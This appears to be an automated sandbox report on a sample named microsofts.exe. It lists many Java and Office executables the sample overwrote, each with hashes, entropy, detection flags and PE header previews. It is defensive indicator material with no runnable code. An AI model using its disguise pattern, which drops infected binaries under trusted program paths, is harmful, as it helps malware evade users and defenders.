Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446081577223107
Encrypted:	false
SSDEEP:	12288:enEbH0j4x7R6SvyCMVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:ekwOtO7VsqjnhMgeiCl7G0nehbGZpbD
MD5:	F3C5CB19A213EF58CA4DA3361AE3B7D2
SHA1:	03BDB84B575DFEEA413E61A0FE1EEB65DC5987EB
SHA-256:	4EB391AF306F195EEE2E7645FA21FB7BBE915E3FDA57457F07DBE129626BC5A7
SHA-512:	FBE434C571F4236187E334A8B5AC0FCB1E55ACE1FC6F295B0C89A7911DD38DEB56EBDFBDA4E36A4FBFBDEF7FFA33213FCECD498B3F276EDF6E85C81010305CC2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@.......1.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1212416
Entropy (8bit):	5.119748380852222
Encrypted:	false
SSDEEP:	12288:Yv1vvIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:w1osqjnhMgeiCl7G0nehbGZpbD
MD5:	6B4B3B58DE0E1E1C6EE820CC91890913
SHA1:	9EF78D00B1ABE8819990FC1BFBD7EDBF7E5EBF0E
SHA-256:	0734D6ED060ED527C51B33587CF246F5D358965933EE023ABA3C904904FB9A7C
SHA-512:	6DEA06C8F2CD8C9781CA4982995335FFE88C6F3EA98E7CAC461BA32646870EE9CC25ED543945B189946FED60DADDD5645856F74E5EEABBCAED4EB5E4A7106EC2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.44683789838969
Encrypted:	false
SSDEEP:	24576:mnU/h/4KusqjnhMgeiCl7G0nehbGZpbD:mU/VCDmg27RnWGj
MD5:	CEC267414DDBB7CF9EE05E6F0037BBB3
SHA1:	C158B7AF65842693A7A5AFE1F84BF53A579D6A02
SHA-256:	6A3630D2A8E53CFCC83AA38D03FE54C5F424CE7B43DCC152D98549DEA007C061
SHA-512:	9D414AF2FAFF656DAD7498B5CC1ABB504A6F1970247CB2E3172A8B54A64A7FC6B1B15C07A885B05345BCA588308E891AAB71887C3AA93C47AA1FCF0C847651ED
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483753184644116
Encrypted:	false
SSDEEP:	24576:mx71iBLZ05jNTmJWExhsqjnhMgeiCl7G0nehbGZpbD:mxhiHIjNg1Dmg27RnWGj
MD5:	0B92587DFDD5C21D25CDDABC67DBE9DD
SHA1:	1ACF2863E7E1AE0060037F9C773DABE46A4B106F
SHA-256:	93F287CE16FCC7B75A89C069178E0ED4E39B4B492D1318F92AACAA306113A8FD
SHA-512:	6502F9140BA1043AE126AB005DC71B057B21F1A5772C7150CF614E5396C3034D98C9B736847032F2AC4F96A019DA747A4615305B76FD5349F2FF98DFEB2A0671
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032899925408059
Encrypted:	false
SSDEEP:	12288:33rkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:HosqjnhMgeiCl7G0nehbGZpbD
MD5:	8BFCEC67C8D12EB0F5204C4B01B2012D
SHA1:	3ABA2BB5C4CE253CCBB01C267151E371123F8A4B
SHA-256:	EDDDFEE5C161D64DCE8C7E70B246E37FB997E6D760658680E305E44B4308D518
SHA-512:	52E3652B5E1015CB50ADF50D76CE019F160AC4C6EE6A28D9A5BD2516467788AFC675A8F81D4979372A3675F451EF317C3405191C67ACADA6829C034B97CB9092
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................'%.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242112
Entropy (8bit):	5.172694240349562
Encrypted:	false
SSDEEP:	12288:VYdP/TXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:idP/TsqjnhMgeiCl7G0nehbGZpbD
MD5:	97621F57DDBF14F6F260D8428397B503
SHA1:	798F270E3A34572AF4581BD1971C65D357D9B3D6
SHA-256:	DFE24762783275B2DB19862A362BE7F3CF39920447F7333CDB8A68BCE1C4834A
SHA-512:	1E690404F22F7D75D5B823473D745E2BB06923E6B3FED140F43C7DC2C7227EFB0DA05D8308032A8B082F44D4249942F98A79BAA9AB50A85543FB0653D099512B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P..................................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032918388829661
Encrypted:	false
SSDEEP:	12288:4y5MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FOsqjnhMgeiCl7G0nehbGZpbD
MD5:	DAC5B82043E5D3BED127A04D354DCD7E
SHA1:	AABCC0609D63198E0337D89560AF018E79946E86
SHA-256:	F4FE49ED0A0625DCA92378EFD791006BC242D90C97D70C06D4EB9BEC5CF1B2D7
SHA-512:	137512F41860BA4B4C38D0DE1B99B0B9834E691F35AEBBBEEC37BC0A0D41629F493E237BD88B85A09235DD92CC92FFA0665DAEF8824C6BAEB89365B03CDF06CB
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032999546035232
Encrypted:	false
SSDEEP:	12288:BKl0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:QCsqjnhMgeiCl7G0nehbGZpbD
MD5:	20BEB028E45E2F0F9308112C0A9B1FA0
SHA1:	DC24C3548D2A044753D4040218993AF84DC372AF
SHA-256:	0C1CF83050CCFE74F5FCB2F2D944E3A20F7A71BDD6D6E263C0FFF5A90E944369
SHA-512:	5B5005F2390CEA10F3FAF2783DD51DB43CD9AB72EFAFF744EF1BEC96F3A015DB0383D67463F5B007D30BC5E61E28CB38DBD44152192FEC75AF85ED93CC513235
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.033001357602929
Encrypted:	false
SSDEEP:	12288:bil0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:eCsqjnhMgeiCl7G0nehbGZpbD
MD5:	0464924457C5C670546D7B1A118D57FC
SHA1:	0AC68DD4944BDB935A22A3D4EC7461F99E898181
SHA-256:	CCC10E743A95C2EAFB6D87409608CC47CDDE5AC2DEB979854B1B95E89A212425
SHA-512:	511D78DBD7C52FE20953D5FFD3EE42856CB442D365CD6FAD5FFBE2709B1854BDF095D1B2BB747FCE67287DA2380C5D8072162E63E0F487FB87EE456189787555
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032972211850547
Encrypted:	false
SSDEEP:	12288:+TmUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oJsqjnhMgeiCl7G0nehbGZpbD
MD5:	31CF8ADDD7820C4B243A72F248F84484
SHA1:	1FBE700AE52B217501361540EE116E115438DA5C
SHA-256:	97E68BDD2B0B8C8E138EBD3A44CED19EFFF736911DB33297B7A75656EB76F263
SHA-512:	1A52A794E1946FD0DD13FA7A59C28F25D5DDA3759E036FA45C8DFC49C22D744E56D2E4D752B33868136C7279F40845358AA01A2CDAA0B3B76C3B2006786B6F7F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................[........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.03388918632637
Encrypted:	false
SSDEEP:	12288:aamIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:N1sqjnhMgeiCl7G0nehbGZpbD
MD5:	04B68CF3BB2CFED9B526BEE6490F025D
SHA1:	FD610223B00019191154C299D7BCC4026C6C5D99
SHA-256:	2FD3543D6F15FD6E675789358F5F6010012F15FD69656D50F4B11B6D1FACDFF8
SHA-512:	BDAB213E0E2B8131204D715AD8848FD55121465978119E81A60E0331205E879AD13FDF229188925623C0C679575C2205D330C7320863AC0C312D326DD24EEBB3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032944859734665
Encrypted:	false
SSDEEP:	12288:WQ5MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dmsqjnhMgeiCl7G0nehbGZpbD
MD5:	41FC2444B218DF1FBB25CDCA58BEE23D
SHA1:	D603766446984CE2E5EEC0BE9FD038C2346301F3
SHA-256:	94D06BCF5A08B0AA31ADCBEA13915130E3543B72C929F2361EAEC367772E0BDA
SHA-512:	524483DA043CED9B9CF379E9C921FF4F8E2EF466F1D4EE25356D610DC6A1F3F81B8E0D190E7FFF7B1FD5828F2865453CFD7A41431A94878A3607929607F4FA42
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.03298165023211
Encrypted:	false
SSDEEP:	12288:pV/0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:LcsqjnhMgeiCl7G0nehbGZpbD
MD5:	581579A1747B1DE1D1F3AE044CAFD91D
SHA1:	7091C5452EB0FAB8FBB305694DDA245A283908A0
SHA-256:	410B06B9D7D23EB883389EA5A2F3A76A91C616F57F887B6318807D117F21DF6F
SHA-512:	2CB28F152607C2E4C3DF3E6483CE10F28222A45A2852C26B31F6C2DB12ABAAD459B1E31F8050C024A6FB85124310E93449D639A67599448FCAC7A7133F083290
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................J4.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.0328948633837705
Encrypted:	false
SSDEEP:	12288:ZZmEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:nJsqjnhMgeiCl7G0nehbGZpbD
MD5:	D7AB99109BC652C0506356C64FE40BE7
SHA1:	78250ABC03A18BCEA7D0173EF70550DC7E28F160
SHA-256:	4C29F549386679E37FB75739DC986FE6C812778AB5F987F860BDDCC8435A7C59
SHA-512:	B2A112F1A4EF1F1393301A11780331009FBEA6160192CE519AFD6FBB5667F2B3C1D687498E9A909031E46E98736C9A5D5860DD416A7C276D778B36C128049699
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................8.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032921786822719
Encrypted:	false
SSDEEP:	12288:SeSqXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7zsqjnhMgeiCl7G0nehbGZpbD
MD5:	082075757A78705672B0FBF4AEB766F4
SHA1:	36C38AE7551240EEB8E2357E8D56AA021DB845BE
SHA-256:	EC91D8F4461BF5A207987AB16AB74219E2FD81025406032C18F97DCE3F7B5950
SHA-512:	9C64B546BC760250B2E1DD3A2A7E569760918082DCC4DBBD83FDE85D73DCF7BCB36C99A15B1B2ED298B70282A7AAB93751E9DB037B09E98318B037582F261BA6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032983383744725
Encrypted:	false
SSDEEP:	12288:n5/iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:5asqjnhMgeiCl7G0nehbGZpbD
MD5:	F2C6562D9168472F7ED04B066BFA9625
SHA1:	5FC53F9E27499E813B8AEAA821A6990F0298CD3D
SHA-256:	79E11EB18FF0D5E4468957CD24081F64581569DE5502330170B31CEFC2C7F749
SHA-512:	106BBDACDB65190143E2175E501048414411E361FD84E1080BE114107BA514B5DD5A32C5A96C7DE051A1CD6FA70A25751E826D9314AC8F9DABE117841F432EA3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1202688
Entropy (8bit):	5.098054392806357
Encrypted:	false
SSDEEP:	12288:g7YXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:g7YsqjnhMgeiCl7G0nehbGZpbD
MD5:	93E5E906E8A5A587ECFE09859CF1F676
SHA1:	CD85C54F6C4B225FE3C722D8FEBBC91F67246089
SHA-256:	83BFC8AF50053EBDE986AB8F49867C0CBEE796F989B8269A2F17F6BD590EF647
SHA-512:	CFD7920D416DFCB4F854DE9B0C18C37A2F190EA03F12A59230DE682092FCEEC1FE1D7117F6A60972E0B86BFB52B2D2264652E0BADA917CB2986DD7E054FDF73E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@..................................O..........................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142784
Entropy (8bit):	5.0323213929349215
Encrypted:	false
SSDEEP:	12288:+KQ+Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3RsqjnhMgeiCl7G0nehbGZpbD
MD5:	F27D19C68D3FEC92F8D0DEEA8EF261B3
SHA1:	953FAF7B8804875E15A873D4099075A0DCFE1032
SHA-256:	F3CE2E221B60C018C142DE7A6245B9CE188057E4AEDD11862B22F263AFF48952
SHA-512:	ABE1D695452E9EE73EB37B1CF7D13CA5A0D21C78FBADE517487976D3D4DF02708F50E0BCD3D246B491517D261C8C9D8533F0BA180003F4573F665AAB92EE8E29
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................$........................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1298944
Entropy (8bit):	5.249085570781096
Encrypted:	false
SSDEEP:	24576:Ri7l/3roAcsqjnhMgeiCl7G0nehbGZpbD:Il/roAIDmg27RnWGj
MD5:	E284BACC2F36BCA8353D942F4AC34732
SHA1:	746302769A7874C9D6D23BF19898670846965639
SHA-256:	7ECEF9AFA6F876391BE8479664FAE594F98E51D1E6F9C572D68AFD39EA758EBF
SHA-512:	5B9EFBC32D9D8D6BAE438989273F05A1DF785389F641139F7A844A67BDCA39622DEB29223D4CE922854F68A718542D22FDD9724348AC0AEC820104A15DE96B32
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1269248
Entropy (8bit):	5.286885616236459
Encrypted:	false
SSDEEP:	12288:i5bfQnwXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:iNfQnwsqjnhMgeiCl7G0nehbGZpbD
MD5:	2647F2E79EEAA1D8835B8FB9B2F65D44
SHA1:	83445C951938EA41527A23EE8546FB9B3848E703
SHA-256:	D9C86B6B25A9C7D706F872600071F59C07E799332F3C8A8DCF79BB09FFE35A45
SHA-512:	70437F5A115343C17DE1A50EA1B2C7EE754A6071924E6A670B6A8D314357665EB8094FEF1A3B228014C69A52B7BE0679BA3973149CE363B98DBFADAA904F86F9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303333272893317
Encrypted:	false
SSDEEP:	12288:WNmt0LDILi217Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:lLiEsqjnhMgeiCl7G0nehbGZpbD
MD5:	FBCB3E93706CDE4562AB9236F6EAAED6
SHA1:	26DDE3B6C6F1FD9680494674C21CB9D199B0CF68
SHA-256:	A00C9675383482DAEFA0B84D417E92815647E24114F03B1EA56F5432DFCD5D49
SHA-512:	0E30BA736723C9EBD979E147049D5B6CF8871B69D56EA551572F5A9BC8B9A3BE65688CF0D726EE46D34550CB898EDBF28F3637B5D9CBB66BC6A585463BF06D68
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................4........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303326798372175
Encrypted:	false
SSDEEP:	12288:0Nmt0LDILi217Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:LLiEsqjnhMgeiCl7G0nehbGZpbD
MD5:	B1828F7460FE49382ABC3DE678C5D65B
SHA1:	DD0C32BCC98CF705C62B2B98F1380CB399E75FCD
SHA-256:	92D5D08A7A340B25F51062AA5C6C154285B5F381C4333F3D3B70A070038DD105
SHA-512:	343D8858FDA50DF8DD32667A86820F25002D565CB0E914F1569BFC04A428CEA5598FA56528EC8984BA451DD673422EDB5DC05D60E0FB33D159A7133E276C6B50
Malicious:	true
Reputation:	unknown
